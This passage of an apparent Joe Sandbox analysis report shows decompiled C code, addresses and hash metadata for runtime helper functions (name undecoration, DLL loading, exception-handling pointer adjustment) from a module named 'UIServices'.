                                                    				if ( *_t89 == 0x40) goto 0x2356da0f;
                                                    				 *(_t132 + 0xf) = 5;
                                                    				 *(_t132 + 7) = 0x235718cc;
                                                    				_t26 = _t132 + 0x17; // 0x6017
                                                    				asm("movaps xmm0, [ebp+0x7]");
                                                    				asm("movdqa [ebp+0x17], xmm0");
                                                    				E00007FFC7FFC23566FF8(_t68, __edi, 0x235718cc, _t100, _t128, _t26, _t130);
                                                    				_t91 =  *0x23574360; // 0x0
                                                    				if ( *(_t128 + 8) - 1 > 0) goto 0x2356da0a;
                                                    				if ( *_t91 == 0) goto 0x2356d9ec;
                                                    				if ( *_t91 == 0x40) goto 0x2356d9e2;
                                                    				_t28 = _t132 + 0x37; // 0x6037
                                                    				E00007FFC7FFC2356BC80(__edi, _t100, _t28, _t128, _t130, __r10, _t143, __r12);
                                                    				 *(_t132 - 9) =  *(_t132 - 9) & 0x00000000;
                                                    				_t31 = _t132 - 9; // 0x5ff7
                                                    				 *(_t132 - 1) =  *(_t132 - 1) & 0x00000000;
                                                    				_t101 = _t91;
                                                    				E00007FFC7FFC23568150(0x60, _t91, _t91, _t31);
                                                    				_t34 = _t132 + 0x17; // 0x6017
                                                    				_t35 = _t132 - 9; // 0x5ff7
                                                    				E00007FFC7FFC23566F74(_t35, _t34, _t91);
                                                    				r8b = 0x27;
                                                    				_t36 = _t132 + 0x47; // 0x6047
                                                    				_t37 = _t132 + 0x17; // 0x6017
                                                    				E00007FFC7FFC23566FA0(_t37, _t36);
                                                    				E00007FFC7FFC23567078( *(_t128 + 8), _t128, _t91, _t91);
                                                    				_t92 =  *0x23574360; // 0x0
                                                    				if ( *_t92 != 0x40) goto 0x2356d9ad;
                                                    				_t93 = _t92 + 1;
                                                    				 *0x23574360 = _t93;
                                                    				_t67 =  *(_t128 + 8);
                                                    				if (_t67 - 1 > 0) goto 0x2356da0a;
                                                    				if ( *_t93 == 0x40) goto 0x2356d931;
                                                    				 *(_t132 + 0xf) = 2;
                                                    				 *(_t132 + 7) = 0x235718d4;
                                                    				_t41 = _t132 + 0x27; // 0x6027
                                                    				asm("movaps xmm0, [ebp+0x7]");
                                                    				asm("movdqa [ebp+0x27], xmm0");
                                                    				goto 0x2356d91f;
                                                    				if (_t67 - 1 > 0) goto 0x2356da0a;
                                                    				if ( *0x235718d4 != 0) goto 0x2356d9f9;
                                                    				E00007FFC7FFC23567198(1, 0x235718d4, _t128, _t41);
                                                    				E00007FFC7FFC2356712C(0x7d, 0x235718d4, _t101, _t128);
                                                    				_t95 =  *0x23574360; // 0x0
                                                    				if ( *_t95 != 0x40) goto 0x2356da43;
                                                    				 *0x23574360 = _t95 + 1;
                                                    				goto 0x2356da43;
                                                    				_t42 = _t132 - 9; // 0x5ff7
                                                    				 *(_t132 + 7) = 0x23571ac0;
                                                    				_t44 = _t132 + 7; // 0x6007
                                                    				E00007FFC7FFC23566F74(_t44, _t42, _t128);
                                                    				 *_t128 =  *(_t132 - 9);
                                                    				_t65 =  *(_t132 - 1);
                                                    				 *(_t128 + 8) = _t65;
                                                    				return _t65;
                                                    			}


















                                                    0x7ffc2356d854
                                                    0x7ffc2356d854
                                                    0x7ffc2356d854
                                                    0x7ffc2356d854
                                                    0x7ffc2356d854
                                                    0x7ffc2356d859
                                                    0x7ffc2356d85f
                                                    0x7ffc2356d86e
                                                    0x7ffc2356d871
                                                    0x7ffc2356d874
                                                    0x7ffc2356d877
                                                    0x7ffc2356d87c
                                                    0x7ffc2356d882
                                                    0x7ffc2356d889
                                                    0x7ffc2356d890
                                                    0x7ffc2356d896
                                                    0x7ffc2356d89b
                                                    0x7ffc2356d89f
                                                    0x7ffc2356d8a3
                                                    0x7ffc2356d8a7
                                                    0x7ffc2356d8ac
                                                    0x7ffc2356d8b0
                                                    0x7ffc2356d8b5
                                                    0x7ffc2356d8b8
                                                    0x7ffc2356d8bd
                                                    0x7ffc2356d8c0
                                                    0x7ffc2356d8c4
                                                    0x7ffc2356d8c8
                                                    0x7ffc2356d8d0
                                                    0x7ffc2356d8d7
                                                    0x7ffc2356d8df
                                                    0x7ffc2356d8e2
                                                    0x7ffc2356d8e5
                                                    0x7ffc2356d8ea
                                                    0x7ffc2356d8f0
                                                    0x7ffc2356d8fa
                                                    0x7ffc2356d907
                                                    0x7ffc2356d90e
                                                    0x7ffc2356d912
                                                    0x7ffc2356d916
                                                    0x7ffc2356d91a
                                                    0x7ffc2356d922
                                                    0x7ffc2356d92a
                                                    0x7ffc2356d934
                                                    0x7ffc2356d93d
                                                    0x7ffc2356d946
                                                    0x7ffc2356d94c
                                                    0x7ffc2356d950
                                                    0x7ffc2356d955
                                                    0x7ffc2356d95a
                                                    0x7ffc2356d95e
                                                    0x7ffc2356d964
                                                    0x7ffc2356d967
                                                    0x7ffc2356d96f
                                                    0x7ffc2356d973
                                                    0x7ffc2356d977
                                                    0x7ffc2356d97c
                                                    0x7ffc2356d97f
                                                    0x7ffc2356d983
                                                    0x7ffc2356d987
                                                    0x7ffc2356d992
                                                    0x7ffc2356d997
                                                    0x7ffc2356d9a1
                                                    0x7ffc2356d9a3
                                                    0x7ffc2356d9a6
                                                    0x7ffc2356d9ad
                                                    0x7ffc2356d9b3
                                                    0x7ffc2356d9b8
                                                    0x7ffc2356d9c5
                                                    0x7ffc2356d9cc
                                                    0x7ffc2356d9d0
                                                    0x7ffc2356d9d4
                                                    0x7ffc2356d9d8
                                                    0x7ffc2356d9dd
                                                    0x7ffc2356d9e5
                                                    0x7ffc2356d9ea
                                                    0x7ffc2356d9f4
                                                    0x7ffc2356d9fe
                                                    0x7ffc2356da03
                                                    0x7ffc2356da0d
                                                    0x7ffc2356da12
                                                    0x7ffc2356da19
                                                    0x7ffc2356da25
                                                    0x7ffc2356da29
                                                    0x7ffc2356da2d
                                                    0x7ffc2356da31
                                                    0x7ffc2356da3a
                                                    0x7ffc2356da3d
                                                    0x7ffc2356da40
                                                    0x7ffc2356da5a

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator+=
                                                    • String ID: {for
                                                    • API String ID: 179159573-864106941
                                                    • Opcode ID: 534cda0995084ab424b88ff705906f0fbc45ae35ad2814ab319565cd73dc21c1
                                                    • Instruction ID: 3b583f928ead73ddc0a0678423cc841dd963668c57c8077e68f5f029c6ce8104
                                                    • Opcode Fuzzy Hash: 534cda0995084ab424b88ff705906f0fbc45ae35ad2814ab319565cd73dc21c1
                                                    • Instruction Fuzzy Hash: C7517E72F08A9AA9E701CF25D8453E877A1FB44748F8084B2EA4C27B99DF7CD654C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 23%
                                                    			E00007FFC7FFC2356664C(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                    				long _t37;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t64;
                                                    				intOrPtr _t66;
                                                    				intOrPtr _t67;
                                                    				struct HINSTANCE__* _t80;
                                                    				long long _t84;
                                                    				void* _t88;
                                                    				struct HINSTANCE__* _t93;
                                                    				long _t96;
                                                    				void* _t99;
                                                    				signed long long _t100;
                                                    				WCHAR* _t103;
                                                    
                                                    				 *((long long*)(_t88 + 8)) = __rbx;
                                                    				 *((long long*)(_t88 + 0x10)) = _t84;
                                                    				 *((long long*)(_t88 + 0x18)) = __rsi;
                                                    				_t60 =  *((intOrPtr*)(0x7ffc23560000 + 0x14318 + _t80 * 8));
                                                    				_t100 = _t99 | 0xffffffff;
                                                    				if (_t60 == _t100) goto 0x2356677a;
                                                    				if (_t60 != 0) goto 0x2356677c;
                                                    				if (__r8 == __r9) goto 0x23566772;
                                                    				_t66 =  *((intOrPtr*)(0x7ffc23560000 + 0x14300 + __rsi * 8));
                                                    				if (_t66 == 0) goto 0x235666bc;
                                                    				if (_t66 != _t100) goto 0x23566754;
                                                    				goto 0x23566728;
                                                    				r8d = 0x800;
                                                    				LoadLibraryExW(_t103, _t99, _t96);
                                                    				_t67 = _t60;
                                                    				if (_t60 != 0) goto 0x23566734;
                                                    				_t37 = GetLastError();
                                                    				if (_t37 != 0x57) goto 0x23566716;
                                                    				_t14 = _t67 + 7; // 0x7
                                                    				r8d = _t14;
                                                    				__imp__wcsncmp();
                                                    				if (_t37 == 0) goto 0x23566716;
                                                    				r8d = 0;
                                                    				LoadLibraryExW(??, ??, ??);
                                                    				if (_t60 != 0) goto 0x23566734;
                                                    				 *((intOrPtr*)(0x7ffc23560000 + 0x14300 + __rsi * 8)) = _t100;
                                                    				goto 0x2356669b;
                                                    				_t21 = 0x7ffc23560000 + 0x14300 + __rsi * 8;
                                                    				_t64 =  *_t21;
                                                    				 *_t21 = _t60;
                                                    				if (_t64 == 0) goto 0x23566754;
                                                    				FreeLibrary(_t93);
                                                    				GetProcAddress(_t80);
                                                    				if (_t64 == 0) goto 0x23566772;
                                                    				 *((intOrPtr*)(0x7ffc23560000 + 0x14318 + _t80 * 8)) = _t64;
                                                    				goto 0x2356677c;
                                                    				 *((intOrPtr*)(0x7ffc23560000 + 0x14318 + _t80 * 8)) = _t100;
                                                    				return 0;
                                                    			}
















                                                    0x7ffc2356664c
                                                    0x7ffc23566651
                                                    0x7ffc23566656
                                                    0x7ffc2356667a
                                                    0x7ffc23566682
                                                    0x7ffc23566689
                                                    0x7ffc23566692
                                                    0x7ffc2356669b
                                                    0x7ffc235666a4
                                                    0x7ffc235666af
                                                    0x7ffc235666b4
                                                    0x7ffc235666ba
                                                    0x7ffc235666c9
                                                    0x7ffc235666cf
                                                    0x7ffc235666d5
                                                    0x7ffc235666db
                                                    0x7ffc235666dd
                                                    0x7ffc235666e6
                                                    0x7ffc235666e8
                                                    0x7ffc235666e8
                                                    0x7ffc235666f6
                                                    0x7ffc235666fe
                                                    0x7ffc23566700
                                                    0x7ffc23566708
                                                    0x7ffc23566714
                                                    0x7ffc23566720
                                                    0x7ffc2356672f
                                                    0x7ffc2356673e
                                                    0x7ffc2356673e
                                                    0x7ffc2356673e
                                                    0x7ffc23566749
                                                    0x7ffc2356674e
                                                    0x7ffc2356675a
                                                    0x7ffc23566763
                                                    0x7ffc23566768
                                                    0x7ffc23566770
                                                    0x7ffc23566772
                                                    0x7ffc23566798

                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFC2356680B,?,?,00000000,00007FFC2356663C,?,?,?,?,00007FFC23566385), ref: 00007FFC235666CF
                                                    • GetLastError.KERNEL32(?,?,?,00007FFC2356680B,?,?,00000000,00007FFC2356663C,?,?,?,?,00007FFC23566385), ref: 00007FFC235666DD
                                                    • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFC2356680B,?,?,00000000,00007FFC2356663C,?,?,?,?,00007FFC23566385), ref: 00007FFC235666F6
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFC2356680B,?,?,00000000,00007FFC2356663C,?,?,?,?,00007FFC23566385), ref: 00007FFC23566708
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFC2356680B,?,?,00000000,00007FFC2356663C,?,?,?,?,00007FFC23566385), ref: 00007FFC2356674E
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFC2356680B,?,?,00000000,00007FFC2356663C,?,?,?,?,00007FFC23566385), ref: 00007FFC2356675A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                    • String ID: api-ms-
                                                    • API String ID: 916704608-2084034818
                                                    • Opcode ID: 50289bf7fa0a5523f363f78bcb6a1aea16f58e5e8faf93b21409ccf8cdf9de00
                                                    • Instruction ID: 34804c3ba610fff2aa2283c35f5637eb2e3e0f0566e66ec8ecd635849a1c6bb1
                                                    • Opcode Fuzzy Hash: 50289bf7fa0a5523f363f78bcb6a1aea16f58e5e8faf93b21409ccf8cdf9de00
                                                    • Instruction Fuzzy Hash: 4231F421F0AA6A81EE15DB02AC041B663E4FF08BA0F490575DD2D6B390EF3CE144CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00007FFC7FFC2356252C(signed int __ecx, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, signed char* __r9, void* __r11, long long _a8, long long _a16, long long _a24) {
                                                    				intOrPtr _v40;
                                                    				void* _t44;
                                                    				void* _t45;
                                                    				void* _t47;
                                                    				void* _t91;
                                                    				long long _t94;
                                                    				long long _t106;
                                                    				long long* _t127;
                                                    				signed char* _t138;
                                                    
                                                    				_t91 = __rax;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_a24 = __rdi;
                                                    				_t138 = __r9;
                                                    				if ( *((intOrPtr*)(__r8 + 8)) == 0) goto 0x23562568;
                                                    				E00007FFC7FFC2356F044(__rax);
                                                    				goto 0x2356256e;
                                                    				r15d = 0;
                                                    				if (__rdi == 0) goto 0x235626f7;
                                                    				if (r15d == 0) goto 0x2356258d;
                                                    				E00007FFC7FFC2356F044(_t91);
                                                    				goto 0x23562590;
                                                    				if ( *((intOrPtr*)(__rdi + 0x10)) == dil) goto 0x235626f7;
                                                    				if ( *((intOrPtr*)(__r8 + 0xc)) != 0) goto 0x235625a8;
                                                    				if ( *(__r8 + 4) >= 0) goto 0x235626f7;
                                                    				if ( *(__r8 + 4) < 0) goto 0x235625b6;
                                                    				_t127 =  *((intOrPtr*)(__r8 + 8)) +  *__rdx;
                                                    				if (( *(__r8 + 4) & 0x00000080) == 0) goto 0x235625ec;
                                                    				if (( *__r9 & 0x00000010) == 0) goto 0x235625ec;
                                                    				_t94 =  *0x23574240; // 0x0
                                                    				if (_t94 == 0) goto 0x235625ec;
                                                    				_t44 =  *0x235701a0();
                                                    				if (_t94 == 0) goto 0x235625e6;
                                                    				if (_t127 == 0) goto 0x235625e6;
                                                    				 *_t127 = _t94;
                                                    				goto 0x23562642;
                                                    				abort();
                                                    				if (( *(__r8 + 4) & 0x00000008) == 0) goto 0x2356260b;
                                                    				_t106 =  *((intOrPtr*)(__rcx + 0x28));
                                                    				if (_t106 == 0) goto 0x23562605;
                                                    				if (_t127 == 0) goto 0x23562605;
                                                    				 *_t127 = _t106;
                                                    				goto 0x23562642;
                                                    				abort();
                                                    				if (( *__r9 & 0x00000001) == 0) goto 0x23562659;
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0x23562653;
                                                    				if (_t127 == 0) goto 0x23562653;
                                                    				_t45 = E00007FFC7FFC235612F0(_t44, _t127,  *((intOrPtr*)(__rcx + 0x28)), __r9[0x14]);
                                                    				if (__r9[0x14] != 8) goto 0x235626e5;
                                                    				if ( *_t127 == __rdi) goto 0x235626e5;
                                                    				E00007FFC7FFC23562130(_t45,  *_t127,  &(__r9[8]));
                                                    				 *_t127 = _t94;
                                                    				goto 0x235626e5;
                                                    				abort();
                                                    				if ( *((intOrPtr*)(_t138 + 0x18)) == 0) goto 0x2356266e;
                                                    				_t47 = E00007FFC7FFC2356F058(_t94);
                                                    				goto 0x23562673;
                                                    				if (__rdi != 0) goto 0x235626aa;
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x235626a4;
                                                    				if (_t127 == 0) goto 0x235626a4;
                                                    				E00007FFC7FFC235612F0(E00007FFC7FFC23562130(_t47,  *((intOrPtr*)(__rcx + 0x28)), _t138 + 8), _t127, _t94,  *((intOrPtr*)(_t138 + 0x14)));
                                                    				goto 0x235626e5;
                                                    				abort();
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x235626e9;
                                                    				if (_t127 == 0) goto 0x235626e9;
                                                    				if (0 == 0) goto 0x235626ca;
                                                    				E00007FFC7FFC2356F058(_t94);
                                                    				goto 0x235626cd;
                                                    				if (__rdi == 0) goto 0x235626e9;
                                                    				asm("sbb ecx, ecx");
                                                    				_v40 =  ~__ecx + 1;
                                                    				goto 0x235626f9;
                                                    				abort();
                                                    				abort();
                                                    				return 0;
                                                    			}












                                                    0x7ffc2356252c
                                                    0x7ffc2356252c
                                                    0x7ffc23562531
                                                    0x7ffc23562536
                                                    0x7ffc23562545
                                                    0x7ffc23562557
                                                    0x7ffc2356255d
                                                    0x7ffc23562566
                                                    0x7ffc2356256b
                                                    0x7ffc23562571
                                                    0x7ffc2356257a
                                                    0x7ffc2356257c
                                                    0x7ffc2356258b
                                                    0x7ffc23562594
                                                    0x7ffc2356259d
                                                    0x7ffc235625a2
                                                    0x7ffc235625ab
                                                    0x7ffc235625b3
                                                    0x7ffc235625ba
                                                    0x7ffc235625c0
                                                    0x7ffc235625c2
                                                    0x7ffc235625cc
                                                    0x7ffc235625ce
                                                    0x7ffc235625d7
                                                    0x7ffc235625dc
                                                    0x7ffc235625de
                                                    0x7ffc235625e4
                                                    0x7ffc235625e6
                                                    0x7ffc235625f0
                                                    0x7ffc235625f2
                                                    0x7ffc235625f9
                                                    0x7ffc235625fe
                                                    0x7ffc23562600
                                                    0x7ffc23562603
                                                    0x7ffc23562605
                                                    0x7ffc2356260f
                                                    0x7ffc23562618
                                                    0x7ffc2356261d
                                                    0x7ffc23562626
                                                    0x7ffc23562630
                                                    0x7ffc23562639
                                                    0x7ffc23562646
                                                    0x7ffc2356264b
                                                    0x7ffc2356264e
                                                    0x7ffc23562653
                                                    0x7ffc2356265d
                                                    0x7ffc23562663
                                                    0x7ffc2356266c
                                                    0x7ffc23562676
                                                    0x7ffc2356267c
                                                    0x7ffc23562681
                                                    0x7ffc2356269d
                                                    0x7ffc235626a2
                                                    0x7ffc235626a4
                                                    0x7ffc235626ae
                                                    0x7ffc235626b3
                                                    0x7ffc235626b7
                                                    0x7ffc235626b9
                                                    0x7ffc235626c8
                                                    0x7ffc235626d0
                                                    0x7ffc235626d9
                                                    0x7ffc235626e1
                                                    0x7ffc235626e7
                                                    0x7ffc235626e9
                                                    0x7ffc235626f0
                                                    0x7ffc23562712

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1501936508-0
                                                    • Opcode ID: 45814ccc6d13f49f6fab86004c78a6726fccaccaa63af34c486a9aecf85c869c
                                                    • Instruction ID: 8c31ced8bb03465498649adac689d7010430e07aa69eba9678ef425fffb32bfb
                                                    • Opcode Fuzzy Hash: 45814ccc6d13f49f6fab86004c78a6726fccaccaa63af34c486a9aecf85c869c
                                                    • Instruction Fuzzy Hash: 0551C231F1EAAA81EB65DB51DD546386394EF14F84F0980B5CA4D6B784DF2CE442CB70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00007FFC7FFC23562348(signed int __ecx, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed char* __r8, signed char* __r9, void* __r11, long long _a8, long long _a16, long long _a24) {
                                                    				intOrPtr _v40;
                                                    				void* _t39;
                                                    				void* _t40;
                                                    				void* _t42;
                                                    				void* _t86;
                                                    				long long _t90;
                                                    				long long _t102;
                                                    				long long* _t123;
                                                    				signed char* _t134;
                                                    
                                                    				_t86 = __rax;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_a24 = __rdi;
                                                    				_t134 = __r9;
                                                    				if (__r8[4] == 0) goto 0x23562384;
                                                    				E00007FFC7FFC2356F044(__rax);
                                                    				goto 0x2356238a;
                                                    				r15d = 0;
                                                    				if (__rdi == 0) goto 0x23562510;
                                                    				if (r15d == 0) goto 0x235623a9;
                                                    				E00007FFC7FFC2356F044(_t86);
                                                    				goto 0x235623ac;
                                                    				if ( *((intOrPtr*)(__rdi + 0x10)) == dil) goto 0x23562510;
                                                    				if (__r8[8] != 0) goto 0x235623c3;
                                                    				if ( *__r8 >= 0) goto 0x23562510;
                                                    				if ( *__r8 < 0) goto 0x235623d1;
                                                    				_t123 = __r8[8] +  *__rdx;
                                                    				if (( *__r8 & 0x00000080) == 0) goto 0x23562406;
                                                    				if (( *__r9 & 0x00000010) == 0) goto 0x23562406;
                                                    				_t90 =  *0x23574240; // 0x0
                                                    				if (_t90 == 0) goto 0x23562406;
                                                    				_t39 =  *0x235701a0();
                                                    				if (_t90 == 0) goto 0x23562400;
                                                    				if (_t123 == 0) goto 0x23562400;
                                                    				 *_t123 = _t90;
                                                    				goto 0x2356245b;
                                                    				abort();
                                                    				if (( *__r8 & 0x00000008) == 0) goto 0x23562424;
                                                    				_t102 =  *((intOrPtr*)(__rcx + 0x28));
                                                    				if (_t102 == 0) goto 0x2356241e;
                                                    				if (_t123 == 0) goto 0x2356241e;
                                                    				 *_t123 = _t102;
                                                    				goto 0x2356245b;
                                                    				abort();
                                                    				if (( *__r9 & 0x00000001) == 0) goto 0x23562472;
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0x2356246c;
                                                    				if (_t123 == 0) goto 0x2356246c;
                                                    				_t40 = E00007FFC7FFC235612F0(_t39, _t123,  *((intOrPtr*)(__rcx + 0x28)), __r9[0x14]);
                                                    				if (__r9[0x14] != 8) goto 0x235624fe;
                                                    				if ( *_t123 == __rdi) goto 0x235624fe;
                                                    				E00007FFC7FFC23562130(_t40,  *_t123,  &(__r9[8]));
                                                    				 *_t123 = _t90;
                                                    				goto 0x235624fe;
                                                    				abort();
                                                    				if ( *((intOrPtr*)(_t134 + 0x18)) == 0) goto 0x23562487;
                                                    				_t42 = E00007FFC7FFC2356F058(_t90);
                                                    				goto 0x2356248c;
                                                    				if (__rdi != 0) goto 0x235624c3;
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x235624bd;
                                                    				if (_t123 == 0) goto 0x235624bd;
                                                    				E00007FFC7FFC235612F0(E00007FFC7FFC23562130(_t42,  *((intOrPtr*)(__rcx + 0x28)), _t134 + 8), _t123, _t90,  *((intOrPtr*)(_t134 + 0x14)));
                                                    				goto 0x235624fe;
                                                    				abort();
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x23562502;
                                                    				if (_t123 == 0) goto 0x23562502;
                                                    				if (0 == 0) goto 0x235624e3;
                                                    				E00007FFC7FFC2356F058(_t90);
                                                    				goto 0x235624e6;
                                                    				if (__rdi == 0) goto 0x23562502;
                                                    				asm("sbb ecx, ecx");
                                                    				_v40 =  ~__ecx + 1;
                                                    				goto 0x23562512;
                                                    				abort();
                                                    				abort();
                                                    				return 0;
                                                    			}












                                                    0x7ffc23562348
                                                    0x7ffc23562348
                                                    0x7ffc2356234d
                                                    0x7ffc23562352
                                                    0x7ffc23562361
                                                    0x7ffc23562373
                                                    0x7ffc23562379
                                                    0x7ffc23562382
                                                    0x7ffc23562387
                                                    0x7ffc2356238d
                                                    0x7ffc23562396
                                                    0x7ffc23562398
                                                    0x7ffc235623a7
                                                    0x7ffc235623b0
                                                    0x7ffc235623b9
                                                    0x7ffc235623bd
                                                    0x7ffc235623c5
                                                    0x7ffc235623ce
                                                    0x7ffc235623d4
                                                    0x7ffc235623da
                                                    0x7ffc235623dc
                                                    0x7ffc235623e6
                                                    0x7ffc235623e8
                                                    0x7ffc235623f1
                                                    0x7ffc235623f6
                                                    0x7ffc235623f8
                                                    0x7ffc235623fe
                                                    0x7ffc23562400
                                                    0x7ffc23562409
                                                    0x7ffc2356240b
                                                    0x7ffc23562412
                                                    0x7ffc23562417
                                                    0x7ffc23562419
                                                    0x7ffc2356241c
                                                    0x7ffc2356241e
                                                    0x7ffc23562428
                                                    0x7ffc23562431
                                                    0x7ffc23562436
                                                    0x7ffc2356243f
                                                    0x7ffc23562449
                                                    0x7ffc23562452
                                                    0x7ffc2356245f
                                                    0x7ffc23562464
                                                    0x7ffc23562467
                                                    0x7ffc2356246c
                                                    0x7ffc23562476
                                                    0x7ffc2356247c
                                                    0x7ffc23562485
                                                    0x7ffc2356248f
                                                    0x7ffc23562495
                                                    0x7ffc2356249a
                                                    0x7ffc235624b6
                                                    0x7ffc235624bb
                                                    0x7ffc235624bd
                                                    0x7ffc235624c7
                                                    0x7ffc235624cc
                                                    0x7ffc235624d0
                                                    0x7ffc235624d2
                                                    0x7ffc235624e1
                                                    0x7ffc235624e9
                                                    0x7ffc235624f2
                                                    0x7ffc235624fa
                                                    0x7ffc23562500
                                                    0x7ffc23562502
                                                    0x7ffc23562509
                                                    0x7ffc2356252b

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1501936508-0
                                                    • Opcode ID: b1620596aa1ccfecfd2cdf2d8d0af50639ec59d8de270438cd69a979c246e5e7
                                                    • Instruction ID: d5c9d73af2411cde25fe3f9aa058c703ebb2feaf0962ee4f9d4a0e6ade59db03
                                                    • Opcode Fuzzy Hash: b1620596aa1ccfecfd2cdf2d8d0af50639ec59d8de270438cd69a979c246e5e7
                                                    • Instruction Fuzzy Hash: 9451B131F2EAAA82EA65CB11DC5463863D0EF54B85F0544B5CE4E6BB94DF2CE442CB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			E00007FFC7FFC2356CF48(void* __edx, void* __edi, long long __rbx, void* __rcx, long long __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r14, long long _a16, long long _a24) {
                                                    				void* _v8;
                                                    				signed int _v24;
                                                    				void* _v25;
                                                    				char _v40;
                                                    				char _v56;
                                                    				intOrPtr _v64;
                                                    				char _v72;
                                                    				signed int _v80;
                                                    				signed long long _v88;
                                                    				long _t35;
                                                    				intOrPtr _t43;
                                                    				void* _t45;
                                                    				signed long long _t54;
                                                    				intOrPtr* _t56;
                                                    				void* _t65;
                                                    				intOrPtr* _t70;
                                                    				intOrPtr _t87;
                                                    				intOrPtr _t88;
                                                    				void* _t92;
                                                    
                                                    				_t45 = __edx;
                                                    				_a16 = __rbx;
                                                    				_a24 = __rdi;
                                                    				_t54 =  *0x23574038; // 0x61e4d8aad2e0
                                                    				_v24 = _t54 ^ _t92 - 0x00000070;
                                                    				_t56 =  *0x23574360; // 0x0
                                                    				_t65 = __rcx;
                                                    				_t43 =  *_t56;
                                                    				if (_t43 != 0x58) goto 0x2356cfaf;
                                                    				_v64 = 4;
                                                    				 *0x23574360 = _t56 + 1;
                                                    				_v72 = "void";
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
